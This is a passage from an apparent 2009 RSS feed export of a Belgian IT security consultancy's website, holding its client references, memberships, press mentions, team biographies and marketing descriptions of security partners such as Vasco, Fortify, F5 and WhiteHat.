<p class="contenttext"><a href="http://www.emakina.com" mce_href="http://www.emakina.com"><img src="/img/security/emakina.gif" alt="emakina"/></a></p>
<p class="contenttext"><a href="http://www.ibling.be" mce_href="http://www.ibling.be"><img src="/img/security/ibling.jpg" alt="ibling"/></a></p>
<p class="contenttext"><a href="http://www.luon.com" mce_href="http://www.luon.com"><img src="/img/security/luon.gif" alt="luon"/></a></p>
<p class="contenttext"><a href="http://www.matexi.be" mce_href="http://www.matexi.be"><img src="/img/security/matexi.jpg" alt="matexi"/></a></p>
<p class="contenttext"><a href="http://www.vondelmolen.be" mce_href="http://www.vondelmolen.be"><img src="/img/security/vondelmolen.png" alt="vondelmolen"/></a></p>
<p class="contenttext"><a href="http://www.anlplastics.com" mce_href="http://www.anlplastics.com"><img src="/img/security/ANLplastics.jpg" alt="ANL plastics"/></a></p>
<p class="contenttext"><a href="http://www.nomadesk.com/" mce_href="http://www.nomadesk.com/"><img src="/img/security/nomadesk.gif" alt="Nomadesk"/></a></p>
<p class="contenttext"><a href="http://www.loqutus.be" mce_href="http://www.loqutus.be"><img src="/img/security/loqutus.gif" alt="LoQutus"/></a></p>
-->]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>References</span></p>
<p class="contenttext">&nbsp;</p>
<?UMBRACO_MACRO macroAlias="ZionSecurityEnReferences" />
<!--
<p>&nbsp;</p>
<p>&nbsp;</p>
<p class="contenttext"><a href="http://www.netlog.com" mce_href="http://www.netlog.com"><img src="/img/security/2_netlog.jpg" alt="Netlog"/></a></p>
<p class="contenttext"><a href="http://www.emailgarage.com" mce_href="http://www.emailgarage.com"><img src="/img/security/emailgarage.gif" alt="emailgarage"/></a></p>
<p class="contenttext"><a href="http://www.reference.be" mce_href="http://www.reference.be"><img src="/img/security/reference.gif" alt="the reference"/></a></p>
<p class="contenttext"><a href="http://www.emakina.com" mce_href="http://www.emakina.com"><img src="/img/security/emakina.gif" alt="emakina"/></a></p>
<p class="contenttext"><a href="http://www.ibling.be" mce_href="http://www.ibling.be"><img src="/img/security/ibling.jpg" alt="ibling"/></a></p>
<p class="contenttext"><a href="http://www.luon.com" mce_href="http://www.luon.com"><img src="/img/security/luon.gif" alt="luon"/></a></p>
<p class="contenttext"><a href="http://www.matexi.be" mce_href="http://www.matexi.be"><img src="/img/security/matexi.jpg" alt="matexi"/></a></p>
<p class="contenttext"><a href="http://www.vondelmolen.be" mce_href="http://www.vondelmolen.be"><img src="/img/security/vondelmolen.png" alt="vondelmolen"/></a></p>
<p class="contenttext"><a href="http://www.anlplastics.com" mce_href="http://www.anlplastics.com"><img src="/img/security/ANLplastics.jpg" alt="ANL plastics"/></a></p>
<p class="contenttext"><a href="http://www.nomadesk.com/" mce_href="http://www.nomadesk.com/"><img src="/img/security/nomadesk.gif" alt="Nomadesk"/></a></p>
<p class="contenttext"><a href="http://www.loqutus.be" mce_href="http://www.loqutus.be"><img src="/img/security/loqutus.gif" alt="LoQutus"/></a></p>
-->]]></content:encoded></item><item><title>Membership</title><link>http://www.zionsecurity.com/company/membership.aspx</link><pubDate>2009-07-29T10:02:24</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/company/membership.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Memberships</span></p>
<p class="contenttext"><a href="http://www.owasp.org/index.php/Main_Page"><img src="/img-sec/membership/ologo.gif"/></a></p>
<p class="contenttext"><a href="http://www.voka.be/"><img src="/img-sec/membership/voka.jpg"/></a></p>
<p class="contenttext"><a href="http://www.leuveninc.com/"><img src="/img-sec/membership/leuveninc.jpg"/></a></p>
<p class="contenttext"><a href="http://www.l-sec.be/"><img src="/img-sec/membership/lsec.png"/></a></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Memberships</span></p>
<p class="contenttext"><a href="http://www.owasp.org/index.php/Main_Page"><img src="/img-sec/membership/ologo.gif"/></a></p>
<p class="contenttext"><a href="http://www.voka.be/"><img src="/img-sec/membership/voka.jpg"/></a></p>
<p class="contenttext"><a href="http://www.leuveninc.com/"><img src="/img-sec/membership/leuveninc.jpg"/></a></p>
<p class="contenttext"><a href="http://www.l-sec.be/"><img src="/img-sec/membership/lsec.png"/></a></p>]]></content:encoded></item><item><title>Press</title><link>http://www.zionsecurity.com/company/press.aspx</link><pubDate>2009-07-29T09:40:21</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/company/press.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N SECURITY in the press</span></p>
<p class="contenttext">Erwin Geirnaert appears on a regular base with a column in IT professional:</p>
<ul class="agenda">
<li> <a href="http://www.itprofessional.be/opinion.cfm?id=98933">Crisis als dankbaar excuus</a>" 25 februari 2009 </li>
<li> <a href="http://www.itprofessional.be/opinion.cfm?id=97915">Staat u ook op de lijst van gehackte sites?</a>" 2 februari 2009 </li>
<li> "<a href="http://www.itprofessional.be/opinion.cfm?id=97083">2009: het begin van de securitycrisis?</a>" 14 januari 2009 </li>
<li> "<a href="http://www.itprofessional.be/opinion.cfm?id=96736">Hoeveel zijn uw kredietkaartgegevens waard?</a>" 6 januari 2009 </li>
<li> "<a href="http://www.itprofessional.be/opinion.cfm?id=94780">U belt toch ook 'gratis'?</a>" 19 november 2008 </li>
</ul>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in <a href="http://napoleon.mediaplanet.com/documents/projects/papers/InformationSecurityDSMARCH.pdf">De Standaard</a> (on page 8).</p>
<p class="contenttext">Interview with Erwin Geirnaert in Trends: "Buying on the Internet: the booby traps"</p>
<p class="contenttext">Interview with Erwin Geirnaert and Jessica Nieuwdorp in Het Nieuwsblad, De Gentenaar and Het Volk. Online version available <a href="http://www.nieuwsblad.be/Article/Detail.aspx?ArticleID=GIFTQVPA" target="_blank">here</a> (in Dutch).</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in Smart Business Strategies</p>
<p class="contenttext">Interview with Erwin Geirnaert in Jobat</p>
<p class="contenttext">ZI<strong class="red">O</strong>N in Ondernemers</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in Business ICT</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in Zelfstandig Ondernemen</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in De Vlaamse Ondernemer</p>
<p class="contenttext">Interview with Erwin Geirnaert in De Tijd</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>ZI<strong class="red">O</strong>N SECURITY in the press</span></p>
<p class="contenttext">Erwin Geirnaert appears on a regular base with a column in IT professional:</p>
<ul class="agenda">
<li> <a href="http://www.itprofessional.be/opinion.cfm?id=98933">Crisis als dankbaar excuus</a>" 25 februari 2009 </li>
<li> <a href="http://www.itprofessional.be/opinion.cfm?id=97915">Staat u ook op de lijst van gehackte sites?</a>" 2 februari 2009 </li>
<li> "<a href="http://www.itprofessional.be/opinion.cfm?id=97083">2009: het begin van de securitycrisis?</a>" 14 januari 2009 </li>
<li> "<a href="http://www.itprofessional.be/opinion.cfm?id=96736">Hoeveel zijn uw kredietkaartgegevens waard?</a>" 6 januari 2009 </li>
<li> "<a href="http://www.itprofessional.be/opinion.cfm?id=94780">U belt toch ook 'gratis'?</a>" 19 november 2008 </li>
</ul>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in <a href="http://napoleon.mediaplanet.com/documents/projects/papers/InformationSecurityDSMARCH.pdf">De Standaard</a> (on page 8).</p>
<p class="contenttext">Interview with Erwin Geirnaert in Trends: "Buying on the Internet: the booby traps"</p>
<p class="contenttext">Interview with Erwin Geirnaert and Jessica Nieuwdorp in Het Nieuwsblad, De Gentenaar and Het Volk. Online version available <a href="http://www.nieuwsblad.be/Article/Detail.aspx?ArticleID=GIFTQVPA" target="_blank">here</a> (in Dutch).</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in Smart Business Strategies</p>
<p class="contenttext">Interview with Erwin Geirnaert in Jobat</p>
<p class="contenttext">ZI<strong class="red">O</strong>N in Ondernemers</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in Business ICT</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in Zelfstandig Ondernemen</p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY in De Vlaamse Ondernemer</p>
<p class="contenttext">Interview with Erwin Geirnaert in De Tijd</p>]]></content:encoded></item><item><title>Team</title><link>http://www.zionsecurity.com/company/team.aspx</link><pubDate>2009-07-29T09:35:18</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/company/team.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>We are experts in IT and security</span></p>
<p class="contenttext">Our consultants are experts in IT and security and have years of expercience executing projects for large, medium and small enterprises. Thanks to our broad experience in IT we offer pragmatic solutions.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Founders</span></p>
<p class="contenttext">ZI<strong><span class="red">O</span></strong>N SECURITY was&nbsp;founded&nbsp;in 2005&nbsp;by Erwin Geirnaert&nbsp;and Jessica Nieuwdorp.</p>
<p class="contenttext"><strong>Erwin Geirnaert</strong> is a Master of Science in Computer&nbsp;Science from the University of Ghent, Belgium. He is specialized in information security. He obtained different international certifications like&nbsp;Certified Information Systems Security Professional&nbsp;from ISC&sup2;&nbsp;and Certified Information Systems Auditor&nbsp;from ISACA. He is a&nbsp;respected authority in&nbsp;the field of application security and has years of experience in securing e-business architectures.&nbsp;</p>
<p class="contenttext"><a href="http://www.linkedin.com/in/erwingeirnaert"><img src="http://www.linkedin.com/img/webpromo/btn_viewmy_160x33.gif" width="160" height="33" alt="View Erwin Geirnaert, CISSP, CISA's profile on LinkedIn" border="0"/></a></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Colleagues</span></p>
<p class="contenttext"><strong>Johan Braeken </strong>graduated as professional bachelor in Applied Computer Science at the Provincial College in Hasselt. After a career at multiple Belgian consultancy companies such as Ubizen, Johan chose to join the ZI<strong class="red">O</strong>N SECURITY -team. Johan has more than 10 years experience in information security and is a renowned Linux expert. He has various certificates and is specialized in networksecurity and firewalls. Johan has experience in penetration testing and audit, such as verifying whether systems are configured correctly according to the standards. Johan gives security training together with Erwin within ZI<strong class="red">O</strong>N UNIVERSITY.</p>
<p class="contenttext"><strong>Christophe Joos</strong> graduated in 2008 as a Master in Economic Sciences. He specialized in Marketing Management. After a short period of employment at Toyota, he joined ZI<strong class="red">O</strong>N SECURITY as head of Marketing and Sales.&nbsp;</p>
<p class="contenttext"><strong>Maarten Aerts</strong> graduated in 2008 as a Professional Bachelor in Applied Computer Science. He worked at Ordina as a Junior Sharepoint Consultant. Maarten was hired by ZI<strong class="red">O</strong>N SECURITY as a Software Security Expert.</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>We are experts in IT and security</span></p>
<p class="contenttext">Our consultants are experts in IT and security and have years of expercience executing projects for large, medium and small enterprises. Thanks to our broad experience in IT we offer pragmatic solutions.</p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Founders</span></p>
<p class="contenttext">ZI<strong><span class="red">O</span></strong>N SECURITY was&nbsp;founded&nbsp;in 2005&nbsp;by Erwin Geirnaert&nbsp;and Jessica Nieuwdorp.</p>
<p class="contenttext"><strong>Erwin Geirnaert</strong> is a Master of Science in Computer&nbsp;Science from the University of Ghent, Belgium. He is specialized in information security. He obtained different international certifications like&nbsp;Certified Information Systems Security Professional&nbsp;from ISC&sup2;&nbsp;and Certified Information Systems Auditor&nbsp;from ISACA. He is a&nbsp;respected authority in&nbsp;the field of application security and has years of experience in securing e-business architectures.&nbsp;</p>
<p class="contenttext"><a href="http://www.linkedin.com/in/erwingeirnaert"><img src="http://www.linkedin.com/img/webpromo/btn_viewmy_160x33.gif" width="160" height="33" alt="View Erwin Geirnaert, CISSP, CISA's profile on LinkedIn" border="0"/></a></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Colleagues</span></p>
<p class="contenttext"><strong>Johan Braeken </strong>graduated as professional bachelor in Applied Computer Science at the Provincial College in Hasselt. After a career at multiple Belgian consultancy companies such as Ubizen, Johan chose to join the ZI<strong class="red">O</strong>N SECURITY -team. Johan has more than 10 years experience in information security and is a renowned Linux expert. He has various certificates and is specialized in networksecurity and firewalls. Johan has experience in penetration testing and audit, such as verifying whether systems are configured correctly according to the standards. Johan gives security training together with Erwin within ZI<strong class="red">O</strong>N UNIVERSITY.</p>
<p class="contenttext"><strong>Christophe Joos</strong> graduated in 2008 as a Master in Economic Sciences. He specialized in Marketing Management. After a short period of employment at Toyota, he joined ZI<strong class="red">O</strong>N SECURITY as head of Marketing and Sales.&nbsp;</p>
<p class="contenttext"><strong>Maarten Aerts</strong> graduated in 2008 as a Professional Bachelor in Applied Computer Science. He worked at Ordina as a Junior Sharepoint Consultant. Maarten was hired by ZI<strong class="red">O</strong>N SECURITY as a Software Security Expert.</p>]]></content:encoded></item><item><title>Vasco</title><link>http://www.zionsecurity.com/partners/vasco.aspx</link><pubDate>2009-07-29T09:06:13</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/vasco.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Vasco</span></p>
<p class="contenttext">Vasco is a Belgian leader in the market of strong authentication. Strong authentication helps securing the access to applications. A password is a not enough. Users are obliged to authenticate using a device, a Digipass, that will generate a single-use or one-tim password. With this password, access through a VPN can be setup secure as well as access to a webmail environment and web applications.</p>
<p class="contenttext">More information:&nbsp;<a href="http://www.vasco.com/" target="_blank">www.vasco.com</a></p>
<p class="contenttext"><img src="/img-sec/partners/big/vasco.gif" border="0" align="top"/></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Vasco</span></p>
<p class="contenttext">Vasco is a Belgian leader in the market of strong authentication. Strong authentication helps securing the access to applications. A password is a not enough. Users are obliged to authenticate using a device, a Digipass, that will generate a single-use or one-tim password. With this password, access through a VPN can be setup secure as well as access to a webmail environment and web applications.</p>
<p class="contenttext">More information:&nbsp;<a href="http://www.vasco.com/" target="_blank">www.vasco.com</a></p>
<p class="contenttext"><img src="/img-sec/partners/big/vasco.gif" border="0" align="top"/></p>]]></content:encoded></item><item><title>Tufin</title><link>http://www.zionsecurity.com/partners/tufin.aspx</link><pubDate>2009-07-29T09:03:03</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/tufin.aspx</guid><description><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Tufin</span></p>
<p class="contenttext">Most organizations have difficulties to manage and audit their increasingly complex firewall environments. Administrators today need a comprehensive management solution for monitoring all changes performed throughout their firewall policies.</p>
<p class="contenttext">Companies have come to understand the business impact of network security and to demand a high level of transparency and accountability. To meet these requirements, organizations need the ability to perform periodical audits to ensure compliance with three different levels of security directives: regulatory requirements, corporate policy and industry best practices.</p>
<p class="contenttext">Does your organisation has the capability to audit, manage and monitor your complex firewall environment?</p>
<p class="contenttext">Looking for a tool that can help you doing this? <strong>Discover now Tufin SecureTrack!</strong></p>]]></description><content:encoded><![CDATA[ <p><img src="/img-sec/partners/big/Tufin_logo_Web.jpg" style="float: right;"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>Tufin</span></p>
<p class="contenttext">Most organizations have difficulties to manage and audit their increasingly complex firewall environments. Administrators today need a comprehensive management solution for monitoring all changes performed throughout their firewall policies.</p>
<p class="contenttext">Companies have come to understand the business impact of network security and to demand a high level of transparency and accountability. To meet these requirements, organizations need the ability to perform periodical audits to ensure compliance with three different levels of security directives: regulatory requirements, corporate policy and industry best practices.</p>
<p class="contenttext">Does your organisation has the capability to audit, manage and monitor your complex firewall environment?</p>
<p class="contenttext">Looking for a tool that can help you doing this? <strong>Discover now Tufin SecureTrack!</strong></p>]]></content:encoded></item><item><title>Fortify</title><link>http://www.zionsecurity.com/partners/fortify.aspx</link><pubDate>2009-07-29T08:51:56</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/fortify.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Fortify</span></p>
<p class="contenttext">Fortify's Business Software Assurance products and services protect companies from the threats posed by security flaws in business-critical software applications.</p>
<p class="contenttext">Combining deep application security expertise with extensive software development experience, Fortify Software has defined the market with award-winning products that assure software security from development to production. Today, Fortify Software fortifies the software for the most demanding customer deployments, including the world&rsquo;s largest, most varied code bases.</p>
<p class="contenttext">For more information visit&nbsp;<a href="http://www.fortify.com/" target="_blank">www.fortify.com</a></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY selected Fortify for its static analysis tool. Static analysis of source code allows to execute a code review in an automated way, reducing manual analysis of C, C++, ASP.NET, Java, ... Security vulnerabilities are reported in a dashboard which will be verified by ZI<strong class="red">O</strong>N SECURITY application security experts.</p>
<p class="contenttext">
<table border="0" cellspacing="0" cellpadding="0" class="imgtext-nowrap">
<tbody>
<tr>
<td colspan="2" align="center"><img src="/img-sec/partners/big/logo.fortify.print.png" border="0"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="346" class="imgtext-table">
<tbody>
<tr>
<td valign="top"><img src="/img-sec/products_360_diagram.gif" width="345" height="285" border="0" align="top"/><br /></td>
</tr>
<tr>
<td align="left">
<div style="text-align: center;"><span class="timepost">Fortify 360</span></div>
</td>
</tr>
</tbody>
</table>
</td>
<td valign="top">
<p><span class="title">Fortify 360</span></p>
<p class="contenttext">Fortify 360 identifies, prioritizes and helps you eliminate security vulnerabilities in software. It delivers:</p>
<p class="contenttext">Vulnerability Detection: Detect vulnerabilities with static and dynamic analysis</p>
<p class="contenttext">Collaborative Remediation: Fix vulnerabilities in a shared workspace</p>
<p class="contenttext">Reporting and Governance: Manage and report on the process</p>
<p class="contenttext">Threat Intelligence: Stay ahead with cutting edge research</p>
</td>
</tr>
</tbody>
</table>
</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Fortify</span></p>
<p class="contenttext">Fortify's Business Software Assurance products and services protect companies from the threats posed by security flaws in business-critical software applications.</p>
<p class="contenttext">Combining deep application security expertise with extensive software development experience, Fortify Software has defined the market with award-winning products that assure software security from development to production. Today, Fortify Software fortifies the software for the most demanding customer deployments, including the world&rsquo;s largest, most varied code bases.</p>
<p class="contenttext">For more information visit&nbsp;<a href="http://www.fortify.com/" target="_blank">www.fortify.com</a></p>
<p class="contenttext">ZI<strong class="red">O</strong>N SECURITY selected Fortify for its static analysis tool. Static analysis of source code allows to execute a code review in an automated way, reducing manual analysis of C, C++, ASP.NET, Java, ... Security vulnerabilities are reported in a dashboard which will be verified by ZI<strong class="red">O</strong>N SECURITY application security experts.</p>
<p class="contenttext">
<table border="0" cellspacing="0" cellpadding="0" class="imgtext-nowrap">
<tbody>
<tr>
<td colspan="2" align="center"><img src="/img-sec/partners/big/logo.fortify.print.png" border="0"/></td>
</tr>
<tr>
<td valign="top">
<table border="0" cellspacing="0" cellpadding="0" width="346" class="imgtext-table">
<tbody>
<tr>
<td valign="top"><img src="/img-sec/products_360_diagram.gif" width="345" height="285" border="0" align="top"/><br /></td>
</tr>
<tr>
<td align="left">
<div style="text-align: center;"><span class="timepost">Fortify 360</span></div>
</td>
</tr>
</tbody>
</table>
</td>
<td valign="top">
<p><span class="title">Fortify 360</span></p>
<p class="contenttext">Fortify 360 identifies, prioritizes and helps you eliminate security vulnerabilities in software. It delivers:</p>
<p class="contenttext">Vulnerability Detection: Detect vulnerabilities with static and dynamic analysis</p>
<p class="contenttext">Collaborative Remediation: Fix vulnerabilities in a shared workspace</p>
<p class="contenttext">Reporting and Governance: Manage and report on the process</p>
<p class="contenttext">Threat Intelligence: Stay ahead with cutting edge research</p>
</td>
</tr>
</tbody>
</table>
</p>]]></content:encoded></item><item><title>F5</title><link>http://www.zionsecurity.com/partners/f5.aspx</link><pubDate>2009-07-28T17:32:14</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/f5.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>About F5</span></p>
<p class="contenttext">F5 solutions provide an advanced web application firewall along with comprehensive web application security. This combination significantly reduces the risk of damage to intellectual property, data, and web applications. With F5, you get a complete solution that eliminates the need for multiple appliances, lowers maintenance and management costs, and increases the confidentiality, availability, and integrity of your applications and processes.</p>
<p class="contenttext">For more information visit&nbsp;<a href="http://www.f5.com" target="_blank">www.f5.com</a></p>
<p class="contenttext">ZI<strong><span class="red">O</span></strong>N SECURITY offers managed application security services (MASS) with the F5 Big-IP Application Security Manager (ASM), a secure and accurate web application firewall.</p>
<p class="contenttext"><img src="/img-sec/partners/big/f5-logo.gif" width="324" height="65" border="0" align="top"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Download a whitepaper from F5 about web application firewalls</span></p>
<p class="contenttext"><a href="/media/3385/app-firewall-wp.pdf" target="_blank">app-firewall-wp.pdf</a></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>About F5</span></p>
<p class="contenttext">F5 solutions provide an advanced web application firewall along with comprehensive web application security. This combination significantly reduces the risk of damage to intellectual property, data, and web applications. With F5, you get a complete solution that eliminates the need for multiple appliances, lowers maintenance and management costs, and increases the confidentiality, availability, and integrity of your applications and processes.</p>
<p class="contenttext">For more information visit&nbsp;<a href="http://www.f5.com" target="_blank">www.f5.com</a></p>
<p class="contenttext">ZI<strong><span class="red">O</span></strong>N SECURITY offers managed application security services (MASS) with the F5 Big-IP Application Security Manager (ASM), a secure and accurate web application firewall.</p>
<p class="contenttext"><img src="/img-sec/partners/big/f5-logo.gif" width="324" height="65" border="0" align="top"/></p>
<p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absMiddle"/>Download a whitepaper from F5 about web application firewalls</span></p>
<p class="contenttext"><a href="/media/3385/app-firewall-wp.pdf" target="_blank">app-firewall-wp.pdf</a></p>]]></content:encoded></item><item><title>Breach Security</title><link>http://www.zionsecurity.com/partners/breach-security.aspx</link><pubDate>2009-07-28T17:29:31</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/breach-security.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Breach Security</span></p>
<p class="contenttext">Breach Security, Inc., a leader in the emerging market for Intelligent Web Application Security, addresses today's Web security needs with next-generation Web protection solutions.</p>
<p class="contenttext">Breach's products address both enterprise and governmental needs using a unique combination of detection and prevention technology to secure business-critical Web applications from targeted cyber attacks. With Breach's Web application protection, cyber crimes are averted and privileged information remains secure.</p>
<p class="contenttext">Unlike existing network security solutions such as firewalls or intrusion detection and prevention systems (IDS/IPS) that address network-level threats across organizations, Breach technology fills the security gap left by existing technologies to address targeted application-level threats. Breach solutions provide an effective, automated, cost-effective means to secure Web applications from cyber attacks.</p>
<p class="contenttext">ZI<strong><span class="red">O</span></strong>N SECURITY partnered with Breach Security for the open-source product ModSecurity. ModSecurity is the creation of Ivan Ristic, one of the experts in web application firewalls.</p>
<p class="contenttext">For more information about ModSecurity, click <a href="/contact.aspx">here</a>.</p>
<p class="contenttext">&nbsp;</p>
<p class="contenttext"><img src="/img-sec/partners/big/breach_logo.gif" width="194" height="99" border="0" style="float: left;" align="top"/></p>
<p class="contenttext">&nbsp;</p>
<p class="contenttext">&nbsp;</p>
<p class="contenttext">&nbsp;</p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Breach Security</span></p>
<p class="contenttext">Breach Security, Inc., a leader in the emerging market for Intelligent Web Application Security, addresses today's Web security needs with next-generation Web protection solutions.</p>
<p class="contenttext">Breach's products address both enterprise and governmental needs using a unique combination of detection and prevention technology to secure business-critical Web applications from targeted cyber attacks. With Breach's Web application protection, cyber crimes are averted and privileged information remains secure.</p>
<p class="contenttext">Unlike existing network security solutions such as firewalls or intrusion detection and prevention systems (IDS/IPS) that address network-level threats across organizations, Breach technology fills the security gap left by existing technologies to address targeted application-level threats. Breach solutions provide an effective, automated, cost-effective means to secure Web applications from cyber attacks.</p>
<p class="contenttext">ZI<strong><span class="red">O</span></strong>N SECURITY partnered with Breach Security for the open-source product ModSecurity. ModSecurity is the creation of Ivan Ristic, one of the experts in web application firewalls.</p>
<p class="contenttext">For more information about ModSecurity, click <a href="/contact.aspx">here</a>.</p>
<p class="contenttext">&nbsp;</p>
<p class="contenttext"><img src="/img-sec/partners/big/breach_logo.gif" width="194" height="99" border="0" style="float: left;" align="top"/></p>
<p class="contenttext">&nbsp;</p>
<p class="contenttext">&nbsp;</p>
<p class="contenttext">&nbsp;</p>]]></content:encoded></item><item><title>Testronic Laboratories</title><link>http://www.zionsecurity.com/partners/testronic-laboratories.aspx</link><pubDate>2009-07-28T17:21:47</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/testronic-laboratories.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Testronic Laboratories</span></p>
<p class="contenttext">Testronic Laboratories, established in 1998, offers professional and confidential independent quality assurance services to the Home Entertainment and New Media Industries.</p>
<p class="contenttext">A worldwide service is offered from Testronic Laboratories' facilities in the US, UK, Belgium and Poland.&nbsp;In total, Testronic Labs employs over 260 permanent and freelance personnel.</p>
<p class="contenttext">Testronic Laboratories specialises in multimedia quality assurance for all types of content (film, game, music, etc.) on all mediums (DVD, HD-DVD, Blu-ray, CD, online, wireless, etc.) for all devices (optical players, PC, mobile equipment, game consoles, etc.).</p>
<p class="contenttext">Testronic Laboratories&nbsp;offers a wide variety and flexibility of services including Device Compatibility, Functionality, Content Verification &amp; Compliance, Localisation Testing, Controlled Copy Protection Technology and Load Testing.</p>
<p class="contenttext">Testronic Labs'&nbsp;sites operate to identical standards, which are continually developed in conjunction with evolving markets, clients needs and experience gained over many years. This enables Testronic Labs to guarantee the uniformity of approach essential to multinational developers, titleholders, publishers, distributors and manufacturers.</p>
<p class="contenttext">For more information, please visit <a href="http://www.testroniclabs.com">www.testroniclabs.com</a>.</p>
<p class="contenttext"><img src="/img-sec/partners/big/testronic_logo.jpg"/></p>]]></description><content:encoded><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About Testronic Laboratories</span></p>
<p class="contenttext">Testronic Laboratories, established in 1998, offers professional and confidential independent quality assurance services to the Home Entertainment and New Media Industries.</p>
<p class="contenttext">A worldwide service is offered from Testronic Laboratories' facilities in the US, UK, Belgium and Poland.&nbsp;In total, Testronic Labs employs over 260 permanent and freelance personnel.</p>
<p class="contenttext">Testronic Laboratories specialises in multimedia quality assurance for all types of content (film, game, music, etc.) on all mediums (DVD, HD-DVD, Blu-ray, CD, online, wireless, etc.) for all devices (optical players, PC, mobile equipment, game consoles, etc.).</p>
<p class="contenttext">Testronic Laboratories&nbsp;offers a wide variety and flexibility of services including Device Compatibility, Functionality, Content Verification &amp; Compliance, Localisation Testing, Controlled Copy Protection Technology and Load Testing.</p>
<p class="contenttext">Testronic Labs'&nbsp;sites operate to identical standards, which are continually developed in conjunction with evolving markets, clients needs and experience gained over many years. This enables Testronic Labs to guarantee the uniformity of approach essential to multinational developers, titleholders, publishers, distributors and manufacturers.</p>
<p class="contenttext">For more information, please visit <a href="http://www.testroniclabs.com">www.testroniclabs.com</a>.</p>
<p class="contenttext"><img src="/img-sec/partners/big/testronic_logo.jpg"/></p>]]></content:encoded></item><item><title>WhiteHat Security</title><link>http://www.zionsecurity.com/partners/whitehat-security.aspx</link><pubDate>2009-07-28T17:18:15</pubDate><dc:creator>Administrator</dc:creator><category></category><guid>http://www.zionsecurity.com/partners/whitehat-security.aspx</guid><description><![CDATA[ <p><span class="title"><img src="/img-sec/bullet.gif" width="26" height="12" border="0" align="absmiddle"/>About WhiteHat Security</span></p>
<p class="contenttext">WhiteHat Security was founded in August 2001 by a team led by Jeremiah Grossman, a security industry veteran and former Yahoo! information security officer. Jeremiah founded the company to provide a comprehensive solution to the growing problem of website security. The company is privately held and headquartered in Santa Clara, California, with sales offices in Austin, Texas and New York, New York.</p>
<p class="contenttext">WhiteHat develops comprehensive, easy-to-use, cost-effective solutions that enable companies to secure valuable customer data, meet federal compliance standards, and maintain customer confidence.</p>
